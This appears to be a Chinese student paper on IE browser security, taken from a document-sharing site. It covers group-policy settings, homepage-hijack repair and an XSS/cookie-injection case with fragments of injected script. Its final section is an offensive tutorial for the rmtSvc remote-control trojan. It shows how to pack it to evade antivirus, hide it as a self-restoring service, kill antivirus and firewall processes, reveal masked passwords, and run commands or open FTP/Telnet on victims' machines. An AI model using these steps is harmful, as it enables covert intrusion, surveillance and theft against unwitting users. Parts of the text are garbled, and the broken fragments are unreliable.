0903032209武连玲Word格式文档下载.docx

0903032209武连玲Word格式文档下载.docx

《0903032209武连玲Word格式文档下载.docx》由会员分享，可在线阅读，更多相关《0903032209武连玲Word格式文档下载.docx（13页珍藏版）》请在冰豆网上搜索。

3.5小知识：

cookie注入-6-

3.6一个典型的例子-6-

4.修复IE-7-

4.1方法一:

修改IE工具栏-7-

4.2方法二:

修改注册表-7-

4.3方法三:

使用IE修复软件-8-

5.如何使用IE远程控制-9-

5．1用IE即可轻松实现远程控制的rmtSvc常用功能的使用方法及技巧-9-

5．1．1有IE想黑就黑-9-

5.1.2武装RmtSvc“暗杀”杀毒软件-10-

5.2用IE控制过把瘾-11-

5.3FTP/Telnet一个都不能少-12-

绪论

进入21世纪，计算机病毒同样进入了一个崭新的时代了。

从功能上来划分，早期的病毒意在破坏计算机软件或者硬件，而当今的病毒却多以窃取目标计算机的信息为目的。

从作者目的上来划分，早期的病毒开发者意在炫耀能力或者证明实力，而当今的病毒开发者更多的考虑到利益的问题。

当今的病毒与黑客技术结合进入了新的病毒时代。

因此我大胆的假设，现在的计算机可以简单的分为安全和健康。

木马和等间谍程序危害计算的安全，传统的病毒则危害计算机的健康。

越来越多的人意识到，计算机的安全远比健康来到重要，受到盗号木马的威胁，让你顷刻之前你的隐私和财产暴露在黑客以及病毒制作者面前，信息的泄漏小则侵害你的个人隐私，大则危害公司命脉，号称软件大王的微软，都曾被黑客入侵而导致大量windows源代码外泄，造成损失过亿。

目前此类盗号以及窥视私人隐私的案例在国内乃至国际已经相当普遍。

许多使用者表示宁愿计算机不健康，也不要你的计算机不安全。

可见其在用户心中的地位。

关键词：

病毒攻防、IE浏览器、修理IE、IE远程控制

1．浏览器的安全设置

1.1浏览器项目设置

在组策略左边窗口中依次展开“用户配置”→“管理模板”→“Windows组件”→“InternetExplorer”项，在右边窗口中便能看到“InternetExplorer”节点下的所有设置和子节点。

IE是WindowsXP自带的网页浏览器，也是大多数用户采用的浏览器，但其安全性也为人所诟病，下面就通过组策略来对其进行“改造”。

1.2在IE工具栏添加快捷方式

　　不知道大家注意到了没有，不少软件在安装完之后都会在IE工具栏上添加图标，单击其便能启用相应程序。

其实用组策略可以在IE工具栏上为任何程序添加快捷方式，这里举例说明如何添加一个ICQ的启动图标。

展开“InternetExplorer维护”下的“浏览器用户界面”，双击“浏览器工具栏自定义”设置项，在弹出来的对话框中单击“添加”按钮，在“浏览器工具栏按钮信息”对话框的“工具栏标题”中输入：

ICQ，在“工具栏操作”中输入D:

\Fun\ICQLite\ICQLite.exe，然后再随便选择一个“颜色图标”和“灰度图标”，当然你也可以用ExeScope等来提取ICQ的图标）。

单击“确定”后IE工具栏中便多了一个ICQ图标！

1.3IE插件不再骚扰你

　　我们平常上网浏览网页时，总会弹出一些诸如“是否安装Flash插件”、“是否安装3721网络实名”的提示，就像广告窗口一样烦人。

实际上我们可在组策略中通过启用“InternetExplorer”节点下的“禁用InternetExplorer组件的自动安装”来禁止这种提示的出现。

不过有时这一功能也是很用的，所以在禁止此功能之前请稍加考虑。

1.4保护好你的个人隐私

　　一般通过单击IE工具栏上的“历史”按钮，便可了解以前浏览过的网页和文件。

为保密起见，你可以通过双击启用“InternetExplorer”节点下的“不要保留最近打开文档的记录”和“退出时清除最近打开的文档记录”两个设置项，这样再单击IE工具栏上的“历史”按钮，你访问过的历史网页记录将全部消失。

1.5禁止项

　　如果不希望他人对你的主页进行修改，可启用“InternetExplorer”节点下的“禁用更改主页设置”设置项禁止别人更改你的主页。

你也可通过访问“浏览器菜单”，启用其中的设置项对IE浏览器的若干菜单项进行屏蔽。

最后，在“Internet控制面板”节点下，你还可对“Internet选项”对话框中的部分选项卡进行隐藏。

2．浏览器主页设置

不怕IE主页被修改

众所周知,修改IE默认主页地址是恶意网页常用的一招。

IE被修改后,会自动连接到恶意网页的地址。

大家常用的方法是修改注册表,其实,只要简单给IE加个参数,就再也不怕IE主页地址被修改了。

下面是具体的步骤。

首先,打开“我的电脑”,找到IE的安装目录,这里假设你的IE安装在C:

\ProgramFiles\InternetExplorer下。

进入该文件夹,找到Iexplore.exe文件,对着它点击鼠标右键,在弹出的快捷菜单中中选择“发送到→桌面快捷方式”,这样就在桌面上建立了一个Iexplore.exe文件的快捷方式。

如果你够仔细的话,你会发现你建立的这个快捷方式名字为“Iexplore.exe”,而桌面上原来的IE快捷方式名字为“InternetExplorer”两者不仅名字不相同,而且“内涵”也不尽相同。

继续我们的工作,.用鼠标右键单击该快捷方式,选择“属性”,会弹出“Iexplore.exe属性”,选择其中的“快捷方式”标签,然后在“目标”框里填入"

C:

\ProgramFiles\InternetExplorer\IEXPLORE.EXE"

-nohome,给Lexplore.exe加上参数“-nohome”,输入时请大家注意在参数“-nohome”前面有一个空格,点击“确定”推出即可。

这样即使主页被修改也没关系,打开IE就是一片空白,就连about:

blank也不显示,而且这样能够加快启动速度,一点IE窗口马上就蹦出来了。

3．防范IE被攻击

3.1防范IE漏洞攻击

近日，一款利用IE7漏洞进行传播的脚本木马在网上迅速传播，该木马利用搜索引擎检索站点漏洞，并进行自动传播。

几天内，数万站点遭受感染，其中、msn中国、东方财经网等都被入侵。

3.2发现恶意软件

某日早上，某网站维护人员小任像往常一样打开了网站首页，随手了一个，想验证一下网站是否可以正常，没想到居然触发了防病毒的软件的报警：

发现恶意软件。

心细的小任在一查之下大吃了一惊：

首页的几乎所有都被加上了一个奇怪的网址hxxp:

//

无奈之下，小任想到了自己单位的网络安全设备提供商启明星辰公司，并立刻联系上该公司驻当地人员，同时一并提供的还有网站的日志文件。

3.3攻击者的手法

很快，小任就得到了启明星辰工程师的反馈信息，在网站的/down.asp页面下，存在一个反射式的XSS漏洞，骇客就是利用这个漏洞，通过cookie注入的方式，将恶意脚本

{ScriptSrc=http:

//c.nu%63%6C

注入到每一个网站中，以达到危害用户的目的。

什么叫反射式XSS

Web客户端使用Server端脚本生成页面为用户提供数据时，如果未经验证的用户数据被包含在页面中而未经HTML实体编码，客户端代码便能够注入到动态页面中。

在这个例子里，骇客将恶意脚本嵌入URL，网站者一旦这个，浏览器将认为恶意代码是来自网站，从而放心的执行。

cookie注入

Cookie注入是SQL注入攻击的一种表现形式，是系统直接使用request（name）获取客户提交的数据，并对客户提交的变量没有过滤，而且在防注入程序中没有限制Request.cookie所导致的。

3.6一个典型的例子

了解了问题的根源，剩下的就是防御问题了。

在启明星辰工程师的协助下，通过安星远程网站安全检查服务，小任挨个清除了页面上所挂木马，同时还发现网站存在数个SQL注入和XSS漏洞，而原有的网站安全检查代码由于无法进行语义一级的还原①，无法彻底杜绝这两类攻击，只有通过部署相应安全产品解决。

在对比了数家国内外的Web安全防御产品后，该网站最终选择了天清入侵防御产品，其采用攻击机理分析方式对Web威胁如SQL注入、XSS攻击等进行精确阻断。

与传统的基于数据特征匹配和基于异常模型构建的Web安全相比，有着更低的漏报率和误报率。

天清入侵防御产品上线后，当小任尝试用此前注入漏洞再次进行攻击时，发现在产品事件监视台上已经及时出现了报警信息并予以了阻断。

再次采用安星检查服务后发现，已经无法嗅探出任何漏洞。

注①：

继续拿/css/c.js木马举例，该木马的注入代码是hxxp:

document.write（{iframesrc='

width='

100'

height='

0'

}{/iframe}）;

这个脚本文件会在一个隐藏的框体中引用有害的：

'

hxxp:

varll=newActiveXObject（snpv+w.Snap+shotView+erCont+rol.1）;

}

rrooxx=I+E+R+P+C+t+l+.I+ERP+Ctl.1;

这种替换躲避手法需要使用到语义还原，如果仅检查关键字，是无法发现和抵御此类攻击的。

注：

代码中所有的{}实为〈〉

javascript:

alert（document.cookie=id=+escape（XXandattackstring）

4.修复IE

修改IE工具栏

在正常情况下，IE首页的修改可以通过IE工具栏里的“工具”－“Internet选项”－“常规”－“主页”功能模块来实现。

在弹出的窗口里，用户只要在“可更改主页”的地址栏中输入自己经常使用的网址然后再点击下面的“使用当前页”按钮就可以将其设为自己的IE首页了；

如果是点击了“使用默认页”则一般会使IE首页调整为微软中国公司的主页；

至于“使用空白页”选项则是让IE首页显示为“blank”字样的空白页，便于用户输入网址。

修改注册表

但是，很多情况下，由于受了恶意程序的控制，进入“IE工具栏”也无法再把其改回来。

有时候，“可更改主页”的地址栏也变成了灰色，无法再进行调整；

有时候，即使你把网址改回来了，再开启IE浏览器，那个恶意网址又跑回来了。

这种情况下我们应该怎么办呢？

最通常的办法是找到相应的注册表文件，把它改回来。

以IE首页的注册表文件修改为例，我们首先要启动Windows的注册表编辑器，具体方法是点击Windows界面左下角的“开始”按钮，再选择“运行”，在弹出的对话框中输入“regedit”就可以进入注册表编辑器了。

IE首页的注册表文件是放在HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\StartPage下的，而这个子键的键值就是IE首页的网址。

以笔者的电脑为例，键值是，它是可以修改的，用户可以改为自己常用的网址，或是改为“about:

blank”，即空白页。

这样，你重启IE就可以看到效果了。

如果这种方法也不能奏效，那就是因为一些病毒或是流氓软件在你的电脑里面安装了一个自运行程序，就算你通过修改注册表恢复了IE首页，但是你一重新启动电脑，这个程序就会自动运行再次篡改。

这时候，我们需要对注册表文件进行更多的修改，运行“regedit”，然后依次展开HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run主键，然后将其下的registry.exe子键删除，然后删除自运行程序c:

\ProgramFiles\registry.exe，最后从IE选项中重新设置起始页就好了。

除了上面的情况外，有些IE被改了起始页后，即使设置了“使用默认页”仍然无效，这是因为IE起始页的默认页也被篡改啦。

对于这种情况，我们同样可以通过修改注册表来解决，运行“regedit.exe”展开HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\Default_Page_URL子键，然后将“Default_Page_UR”子键的键值中的那些篡改网站的网址改掉就好了，或者设置为IE的默认值。

使用IE修复软件

虽然修改注册表的方法十分有效，但是对于一般的电脑用户来说较为专业，而且编辑过程中也涉及到了比较多的英语。

因此，我们在这里介绍大家使用一些专门的修复工具。

一般来说，IE修复工具有两大类。

一是商业机构提供的辅助性工具，如瑞星注册表修复工具、3721的上网助手中附带的IE修复专家、超级兔子中的IE修复工具等等，这些软件大多捆绑在商业软件或是工具软件中，有些还需要付费才能够使用。

其特点是，功能强大，但只是对于正版IE，建议经济实力较强的用户使用。

其中瑞星的注册表修复工具是可以免费单独下载的，尤其推荐大家使用，其下载网址是

另外一类IE修复软件则主要是技术实力比较强的网友自行编写的，其使用效果和瑞星、IE修复专家、超级兔子等相似，但是需要大家自己搜索下载。

这里向大家推荐两款:

一款是IE浏览器修复工具，其下载地址是Basic语言编写的，大家在使用它之前要先安装VB的语言库，相对麻烦一些。

5.如何使用IE远程控制

5．1用IE即可轻松实现远程控制的rmtSvc常用功能的使用方法及技巧

听说过灰鸽子、冰河等可以实现远程控制，但你听说过IE也可以实现吗?

不错，一款基于IE的新鲜工具——rmtSvc&

vIDC即可让微软的IE成为一个超级黑客帮凶。

本文除了将为你展现rmtSvc&

vIDC是如何基于IE远程控制肉鸡以外，更在如何“暗杀”杀毒软件、攻击思路上有较强的指导性。

如果我问你IE能做什么?

你的答案绝对不完整!

IE可不仅仅能浏览网页。

如果我再告诉你IE还能用来远程控制、远程传输、进程管理、代理服务，甚至远程开启Telnet、FTP服务等等呢?

你一定觉得不可思议吧，有了rmtSvc&

vIDC，这一切皆有可能!

5．1．1有IE想黑就黑

简单点说，rmtSvc是一款集FTP、Telnet服务、Proxy服务以及vIDC服务的远程控制工具。

用户可以通过此款工具方便地对远程计算机进行控制。

此工具和其它远程控制工具不同，它采用B/S结构（无需安装），用户可通过浏览器进行远程控制（我们的口号是：

有IE，想黑就黑!

）。

下面，笔者就以入侵控制的实例来为大家分别介绍rmtSvc常用功能的使用方法及技巧。

解压下载后的压缩包，先别急着让rmtSvc.exe在目标机运行（未加壳的程序会遭到杀毒软件的查杀），笔者先告诉大家如何给源程序加壳从而避免被查杀吧（不然就没得玩了-_-|）。

运行该软件，进入“选项”菜单，勾选“保留额外数据”，然后“打开文件”，选择源程序rmtSvc.exe后就会自动压缩了。

特别提醒：

压缩后的rmtSvc.exe不会被杀毒软件查杀，而且文件体积会减少近50%（经过金山毒霸增强版、KV、诺顿测试）,如果想进一步增强隐蔽性，请参考《披着羊皮的狼——将Radmin改造为百分百木马》一文介绍的“超级捆绑”软件的使用方法。

木马程序的欺骗发送本文就不作进一步讨论了。

5.1.2武装RmtSvc“暗杀”杀毒软件

1.打开浏览器输入http:

//IP:

port（其中IP为被控机的IP地址，port为rmtSvc的服务端口，默认为7778）。

连接成功后将会看到如图1的欢迎登录画面，输入访问密码（默认为123456），就可以进行rmtSvc所支持的操作（如果之前已经连同msnlib.dll和webe目录都发给了对方，那么rmtSvc将会多出用MSN进行远程控制和HTTP方式文件管理的功能）。

2.欢迎登录画面的上方为rmtSvc的系统菜单，从左至右的功能依次为：

Pview（进程查看）、Spy++（远程控制管理）、Proxy（启动或停止rmtSvc的代理服务）、vIDC（设置vIDCs的访问权限）、logoff（注销对rmtSvc登录）、Option（配置rmtSvc的运行参数）、About（rmtsvc欢迎/登录画面）。

3.第一次登录需进入rmtSvc的参数设置更改敏感信息（图2），这样才能保障其安全性。

先在“ModifyPassword”修改rmtSvc访问密码，再在“ServicePort”更改rmtSvc服务端口为任意一个4位不常用的端口（需要重启服务才会生效，建议设为高端端口）。

然后将“StartControl、Stolenmode”选上，这样rmtSvc会自动安装为Windows服务随机启动且服务为隐藏属性，这也就意味着在下次启动时，你可以继续控制目标机器。

4.接下来在“Startmode”选项中，设置rmtSvc运行后自动启动FTP和Telnet服务（另外还有Proxy、vIDCs映射等）。

通过FTP可以方便地进行文件上传下载。

再将“Autoinstallservice”和“ForbiddetachingDll”选择上，这样每次程序运行时会自动检测rmtSvc服务是否已安装，如果没有安装则自动安装为服务（相当于自我修复功能）并释放一个DLL文件（可修改文件名，默认为inject.dll）,这是为了防止自动释放的未加壳的DLL被杀毒软件查杀，用户可以选择不释放DLL。

手工将加壳后的DLL拷入到被控机的系统目录下，在释放DLL的名称处填入你加壳后的DLL名称。

高手传经：

rmtSvc释放的DLL主要有以下用处：

隐藏进程、模拟“Ctrl+Alt+Del”按键、显示密码框密码、监视rmtSvc运行情况。

如果异常退出或被杀掉则会自动重新启动，将配置参数写入rmtSvc程序本身（强烈建议选择）。

5.接下来在“KilledProgram”中，设定rmtSvc监视并自动杀掉的进程名称,如有多个进程，各个名称之间以逗号分隔。

例如输入：

PFW.exe,KAVSvc.exe就可以把金山毒霸和天网防火墙关闭。

6.一切设置无误后，点击“Save”保存当前配置，在弹出的对话框中输入reg，将配置参数写入到注册表。

输入self则是将配置参数写入该EXE文件自身，如果填写其它则会生成相应文件名的.exe的副本，并将配置参数写入此EXE副本。

例如：

输入c:

abc.exe，将在c盘根目录下生成一个abc.exe副本，并将配置参数写入此副本。

7.随后rmtSvc服务会重新启动运行。

　高手传经：

隐藏模式下才可以将配置参数写入EXE本身，如果没有保存，每次在rmtSvc正常退出时也会将配置参数写入EXE本身。

8.再次使用新设密码登录后，单击Pview进入“进程查看”页面，在这里将显示三个部分的信息：

系统信息、进程/模块信息、CPU/内存使用信息。

在页面的右边为进程模块显示区域，点击某个进程名则显示此进程的相关模块信息，点击“KillIt”按钮就可以杀掉该进程（需要注意的是进程列表不会实时自动刷新，用户必须手工刷新）。

现在你的rmtSvc已经被武装到了牙齿，还等什么，可以出手了。

5.2用IE控制过把瘾

把挡路的安全软件给“暗杀”后，接下来就可以趁对方不在时使用Spy++远程控制管理来远程控制机器了。

当然在控制前我们需要将相关参数设置妥当，这样才能得到更好的控制效果。

1.在“Quality”显示效果中选择Good（好），“Stretch”设置捕获图像的缩小比率80%。

最后将“Cursor”选上，这样在捕获远程计算机屏幕时就会连同鼠标光标一起捕捉，以便用户知道当前鼠标光标位置。

设置好后点击“Set”使上述三个参数生效。

2.接下来就可以尝试控制了。

当远程桌面图像处于焦点状态（鼠标在图像区域内），你就可以直接敲击键盘发送按键信息，和你操作本地机器一样。

但是对于输入大段的文本这是非常不方便的，因为你的每次按键动作都会作为一次HTTP请求发出，输入速度很慢。

如果你想输入大段文本，可以将鼠标选中Input输入框，然后输入你想要发送的文本，按下回车即可;

如果选中了Crlf复选框，则在你输入的文本后面会自动加入回车换行。

3.但是在进行远程计算机登录时，有些机器可能无法通过Input输入框直接输入登录密码，只能通过模拟键盘输入登录密码。

方法如下：

通过鼠标直接点击桌面图像，系统会自动识别你的鼠标的单击、双击键信息。

如果你在按下鼠标的同时按下了“Shift”、“Alt”或“Ctrl”键，系统也能自动识别。

4.为了更方便地控制远程桌面，可以将远程桌面图像设为自动刷新，这样就不会出现有动作发出而图像没有变化需要手工刷新的情况了。

方法如下，勾选“Auto-refresh”项，在右边输入自动刷新间隔，默认为500ms。

如果想知道远程被控机中密码框中的密码。

则需要用到Password→Text项，在有密码框时此项会变为Text→Password。

此时只要用鼠标左键点击远程桌面图像的密码输入框，则远程被控机密码框中的密码会被翻译成明文显示。

如果你取消此项功能，点击Text→Password项即可，此时此项就会变为Password→Text。

5.如果要远程执行程序，选择Start下拉列表框的Run项，输入你要远程执行的文件名和参数即可，使用方法和Windows的开始菜单的运行命令一致。

如此这般，通过IE就能像操作本机一样控制目标机了。

5.3FTP/Telnet一个都不能少

远程控制似乎并不能让我们感到满足，那就再来开启对方的FTP/Telnet服务，彻底过把入侵瘾吧。

1.进入“FTP&

Telnet”菜单，点击FTP/Telnet服务旁边的“Run”就可以启动相关服务了。

FTP/Telnetport：

设置FTP/Telnet服务的端口，默认FTP为2121，Telnet为2323。

Anonymousaccess：

设置